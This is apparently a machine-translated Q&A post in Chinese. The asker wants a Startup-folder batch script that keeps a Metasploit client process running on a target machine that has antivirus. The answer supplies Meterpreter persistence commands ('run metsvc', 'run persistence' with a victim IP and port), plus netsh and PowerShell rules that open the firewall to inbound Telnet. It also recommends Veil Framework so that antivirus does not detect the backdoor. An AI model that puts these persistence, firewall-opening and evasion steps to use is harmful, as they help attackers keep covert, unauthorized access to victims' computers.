我想爲Metasploit設計一個簡單的持久性腳本,考慮到他們有一個標記爲防病毒。我遇到了代碼應該看起來像什麼的一些麻煩。這是我的計劃: 1.啓動文件夾中的批處理文件,具有循環功能 2.所述批處理文件執行任務列表命令並在運行的進程中搜索文件的名稱 3.如果它發現進程正在運行,它什麼也不做 4.如果它看不到進程正在運行,它只是再次啓動它 這是非常簡單的設計,但我在編寫代碼時遇到了麻煩。我的問題是:我如何將這個想法寫入命令?這個想法是if語句如何影響tasklist命令。所以我需要過濾tasklist命令以查看進程是否正在基於名稱運行,然後我需要將tasklist命令的輸出設置爲變量,以便我可以編寫if語句: if%process% == Client.exe(轉到是)簡單的持久性腳本 - Metasploit
Metasploit附帶默認輔助模塊。在你的情況下,你可以在meterprerter上執行
run metsvc。或
run persistence -U -i <interactive seconds > -p portnumber -r victimip
你也可以使用netsh
netsh advfirewall firewall add rule name="Allow Inbound Telnet" dir=in program= %SystemRoot%\System32\tlntsvr.exe remoteip=localsubnet action=allow
使用PowerShell
New-NetFirewallRule -DisplayName 「Allow Inbound Telnet」 -Direction Inbound -Program %SystemRoot%\System32\tlntsvr.exe -RemoteAddress LocalSubnet -Action Allow
創建規則,如果有任何AV是detceting你的後門,請使用veil framework